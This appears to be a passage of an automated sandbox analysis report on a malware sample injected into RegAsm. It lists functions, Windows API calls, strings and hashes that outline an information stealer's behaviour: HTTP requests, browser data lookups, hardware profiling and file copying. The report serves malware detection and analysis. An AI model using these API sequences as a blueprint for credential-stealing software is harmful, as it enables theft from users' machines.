                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressProc$Internetlstrcpy$Open$strtok_s$HeapProcesslstrcatlstrlen$AllocConnectDirectoryExitHttpInformationOptionRequestSleepVolumeWindowsmemset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3722462685-3916222277
                                                                                                                                                                                                            • Opcode ID: 620c771a363adcb797854fd483a570e9593fb9f58700203a8e62bc0dc9496fe0
                                                                                                                                                                                                            • Instruction ID: 58165f3fe52160a96537da954e3424354f032ff304e95afb39a8e309209fea05
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 620c771a363adcb797854fd483a570e9593fb9f58700203a8e62bc0dc9496fe0
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4A328775D00358EACF10EBA5CD46BDDBB74AF19704F5441AEE40973282DB781B48CBAA
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 00407160 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 119libraryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetEnvironmentVariableA.KERNEL32(00CBF140,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,00000000,004200C0,000000FF,?,0040BBB3,00CC1A80), ref: 00407191
                                                                                                                                                                                                              • Part of subcall function 0040FD00: lstrcpy.KERNEL32(00000000,0041837D), ref: 0040FD29
                                                                                                                                                                                                              • Part of subcall function 0040FD90: lstrlenA.KERNEL32(00418439,?,00000000,?,00417B7D,004271CF,004271CE,00000000,?,00000000,00422B88,000000FF,?,00418439), ref: 0040FD9B
                                                                                                                                                                                                              • Part of subcall function 0040FD90: lstrcpy.KERNEL32(00000000,00418439), ref: 0040FDD2
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrlenA.KERNEL32(?,?,?,?,?,?,00421789,000000FF,?,004183A3,?,00CB2F60,?), ref: 0040FEFC
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FF27
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcat.KERNEL32(?,?), ref: 0040FF31
                                                                                                                                                                                                              • Part of subcall function 0040FE30: lstrcpy.KERNEL32(00000000), ref: 0040FE93
                                                                                                                                                                                                              • Part of subcall function 0040FE30: lstrcat.KERNEL32(?,00000000), ref: 0040FE9F
                                                                                                                                                                                                              • Part of subcall function 0040FDE0: lstrcpy.KERNEL32(00000000), ref: 0040FE20
                                                                                                                                                                                                            • SetEnvironmentVariableA.KERNEL32(00CBF140,00000000,00000000,?,0040BBB3,0042689C,0042689C,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,00426897,?,?,?,00000000,004200C0,000000FF), ref: 0040720E
                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00CC1710,?,?,?,00000000,004200C0,000000FF,?,0040BBB3), ref: 00407226
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 00407186, 004071A4
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                                                                                                                                                                            • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
                                                                                                                                                                                                            • API String ID: 2929475105-3463377506
                                                                                                                                                                                                            • Opcode ID: 8b86da625db6fd619e1cef803d976693ee62706816cca906cce4848e55efc538
                                                                                                                                                                                                            • Instruction ID: 3796380c7ea4b0b42c859cf654b61a59c735054b5350927e5ad8fee425f0db3c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8b86da625db6fd619e1cef803d976693ee62706816cca906cce4848e55efc538
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 67418F70905600EFC724EFA4EC45EAEB776EB18B04F10527EF501A33A1D7786906CBA5
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 00413910 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 87COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 0040FD40: lstrcpy.KERNEL32(00000000), ref: 0040FD68
                                                                                                                                                                                                              • Part of subcall function 00405960: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004059D8
                                                                                                                                                                                                              • Part of subcall function 00405960: StrCmpCA.SHLWAPI(?,00CBF2F0,?,?,?,?,?,?,00000004), ref: 004059F0
                                                                                                                                                                                                              • Part of subcall function 00405960: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405A14
                                                                                                                                                                                                              • Part of subcall function 00405960: HttpOpenRequestA.WININET(00000000,GET,?,00CC2020,00000000,00000000,-00400100,00000000), ref: 00405A4B
                                                                                                                                                                                                              • Part of subcall function 00405960: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405A6F
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413985
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Internet$Open$ConnectHttpOptionRequestlstrcpy
                                                                                                                                                                                                            • String ID: ERROR$ERROR$#B
                                                                                                                                                                                                            • API String ID: 1815705353-4141166672
                                                                                                                                                                                                            • Opcode ID: fa69a4c16b3625696eb2060fcc135cbb163cb8da0c7257eb15ce0c3d79ca3209
                                                                                                                                                                                                            • Instruction ID: 0d8ab5069f63c7b19e2c6bfedcea2f5be373cdb6cb1fa8f47c094fd7b4b7c274
                                                                                                                                                                                                            • Opcode Fuzzy Hash: fa69a4c16b3625696eb2060fcc135cbb163cb8da0c7257eb15ce0c3d79ca3209
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B8313070904289DADB10EBA5C5097DDBBB4AF19308F5041BEED09736C2DB786B0CC7A6
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 0040A050 Relevance: 6.3, APIs: 4, Instructions: 282filestringCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 0040FD00: lstrcpy.KERNEL32(00000000,0041837D), ref: 0040FD29
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrlenA.KERNEL32(?,?,?,?,?,?,00421789,000000FF,?,004183A3,?,00CB2F60,?), ref: 0040FEFC
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FF27
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcat.KERNEL32(?,?), ref: 0040FF31
                                                                                                                                                                                                              • Part of subcall function 0040FDE0: lstrcpy.KERNEL32(00000000), ref: 0040FE20
                                                                                                                                                                                                              • Part of subcall function 00411330: GetSystemTime.KERNEL32(?,00CBE790,004270B8,?,00000000,00000008,?,?,00000000,00421951,000000FF,?,0040452E,0041FC79,00000014), ref: 00411385
                                                                                                                                                                                                              • Part of subcall function 0040FE30: lstrcpy.KERNEL32(00000000), ref: 0040FE93
                                                                                                                                                                                                              • Part of subcall function 0040FE30: lstrcat.KERNEL32(?,00000000), ref: 0040FE9F
                                                                                                                                                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,004268F2,00000009), ref: 0040A107
                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 0040A2EB
                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 0040A2FF
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(00000000), ref: 0040A381
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 211194620-0
                                                                                                                                                                                                            • Opcode ID: 259ab7114b0a0e9579e5625fd4ffd214ac804877fcfce976bf9fdb1141ff1ab4
                                                                                                                                                                                                            • Instruction ID: 9aae0e54b6a35530076d5c0b4432c151ce3d069fbdcbc9d48f8c111fc4be3404
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 259ab7114b0a0e9579e5625fd4ffd214ac804877fcfce976bf9fdb1141ff1ab4
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 78B18170801248EACB14EBE4D955ADDBB78AF29308F54417EE802736C2DB786B0DCB65
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 004103B0 Relevance: 6.0, APIs: 4, Instructions: 39memoryregistryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004103C5
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 004103CC
                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,00CBB3A0,00000000,00020119,00000000), ref: 004103EB
                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(00000000,00CC1910,00000000,00000000,00000000,000000FF), ref: 00410406
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$AllocOpenProcessQueryValue
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3676486918-0
                                                                                                                                                                                                            • Opcode ID: 5e6d39d117e0467e1ea244c9ca8b316610d55b9159fd229541649f6d9304fad4
                                                                                                                                                                                                            • Instruction ID: b6564608f76188cbae41e4f9dcd1262451d29d6e700bef896991869be3721d4d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5e6d39d117e0467e1ea244c9ca8b316610d55b9159fd229541649f6d9304fad4
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 40F04FB9640218FFE710DBA0DC49FAB7B7EEB49B01F005159FB0597241D670590087A0
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 0040E1D0 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 485COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 0040FD00: lstrcpy.KERNEL32(00000000,0041837D), ref: 0040FD29
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,Opera GX,0042691B,0042691A,?,?), ref: 0040E22D
                                                                                                                                                                                                              • Part of subcall function 00411550: SHGetFolderPathA.SHELL32(00000000,viB,00000000,00000000,?,00000000), ref: 00411588
                                                                                                                                                                                                              • Part of subcall function 0040FE30: lstrcpy.KERNEL32(00000000), ref: 0040FE93
                                                                                                                                                                                                              • Part of subcall function 0040FE30: lstrcat.KERNEL32(?,00000000), ref: 0040FE9F
                                                                                                                                                                                                              • Part of subcall function 0040FDE0: lstrcpy.KERNEL32(00000000), ref: 0040FE20
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrlenA.KERNEL32(?,?,?,?,?,?,00421789,000000FF,?,004183A3,?,00CB2F60,?), ref: 0040FEFC
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FF27
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcat.KERNEL32(?,?), ref: 0040FF31
                                                                                                                                                                                                              • Part of subcall function 0040FD40: lstrcpy.KERNEL32(00000000), ref: 0040FD68
                                                                                                                                                                                                              • Part of subcall function 004114F0: GetFileAttributesA.KERNEL32(00000000,00000000,00000000,00421A38,000000FF,?,0040E60A,?,00000000,00000000,00000000,?,?), ref: 00411517
                                                                                                                                                                                                              • Part of subcall function 0040CCC0: StrStrA.SHLWAPI(00000000,00CC1B28,?,?,?,?,?,?,?,?,?,?,?,00421600,?), ref: 0040CD2B
                                                                                                                                                                                                              • Part of subcall function 0040CCC0: memcmp.MSVCRT ref: 0040CD69
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: lstrcpy$lstrcat$AttributesFileFolderPathlstrlenmemcmp
                                                                                                                                                                                                            • String ID: $$Opera GX
                                                                                                                                                                                                            • API String ID: 1439182418-3699434461
                                                                                                                                                                                                            • Opcode ID: df92c891d165dda49c3b5aa5c971450362d28cbbbc681bcfa6ee4c50091f7805
                                                                                                                                                                                                            • Instruction ID: a60c0e83d7133dea113a0c65642fbc2f8910f5f976268970cce7aeb274e4738e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: df92c891d165dda49c3b5aa5c971450362d28cbbbc681bcfa6ee4c50091f7805
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 09128471901248EACB14EBE5D945ADDBB79AF19304F54817EF806732C2DB781B0CC7A6
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 0040EBA9 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 236COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,00CBF240), ref: 0040EBC0
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,00CBF1C0), ref: 0040ECC3
                                                                                                                                                                                                              • Part of subcall function 0040FD40: lstrcpy.KERNEL32(00000000), ref: 0040FD68
                                                                                                                                                                                                              • Part of subcall function 0040E1D0: StrCmpCA.SHLWAPI(00000000,Opera GX,0042691B,0042691A,?,?), ref: 0040E22D
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: lstrcpy
                                                                                                                                                                                                            • String ID: Stable\
                                                                                                                                                                                                            • API String ID: 3722407311-272486606
                                                                                                                                                                                                            • Opcode ID: 59f8e08f7558a173163beafcfa78c020354db955768ab26e2c23cce7549c62a4
                                                                                                                                                                                                            • Instruction ID: 27f8f61f318377d38b03a4306b60b081c4bfc2c6d07bc37ef32a7187f92b0e52
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 59f8e08f7558a173163beafcfa78c020354db955768ab26e2c23cce7549c62a4
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 11B13674900648DFCB24DFA9C585ADEBBF0BF48304F10857EE846A7781D774AA08CBA5
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 00410BB0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetCurrentHwProfileA.ADVAPI32(?), ref: 00410BC5
                                                                                                                                                                                                              • Part of subcall function 0040FD00: lstrcpy.KERNEL32(00000000,0041837D), ref: 0040FD29
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CurrentProfilelstrcpy
                                                                                                                                                                                                            • String ID: /A$Unknown
                                                                                                                                                                                                            • API String ID: 2831436455-3225385856
                                                                                                                                                                                                            • Opcode ID: a289313a1c43853b20ba41a7e5a0329116280f4093d9359a59e28a28a0453240
                                                                                                                                                                                                            • Instruction ID: cf33e8aa15540ab4f688a8f84d7e3bc3b49be2e18d33bb7ac7994cd948ce4af1
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a289313a1c43853b20ba41a7e5a0329116280f4093d9359a59e28a28a0453240
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 72E01231B0412867CB20AE98BC057EE776CDB48619F1041BAFD19D7680DE699A1847D9
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 004118A0 Relevance: 4.5, APIs: 3, Instructions: 31COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenProcess.KERNEL32(00000410,00000000,?), ref: 004118BC
                                                                                                                                                                                                            • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 004118D7
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 004118DE
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3183270410-0
                                                                                                                                                                                                            • Opcode ID: 06d121d31f29259dc3995595a0535b143e5bd24c6078a6cc88d6e866ccbc975b
                                                                                                                                                                                                            • Instruction ID: 8a64f7277e672882e394d90ab91b0c49a86f9b36a080af93395ebaab304c6fb5
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 06d121d31f29259dc3995595a0535b143e5bd24c6078a6cc88d6e866ccbc975b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 96F02735A0523877E720AB84DC09FDE77289F05700F000095FF88AB2C0DAB05E8487D4
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 00406900 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60memoryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • VirtualProtect.KERNEL32(?,?,00000040,Vj@,?,?,?,?,00406A56,?,?,?,?,00000000), ref: 00406975
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
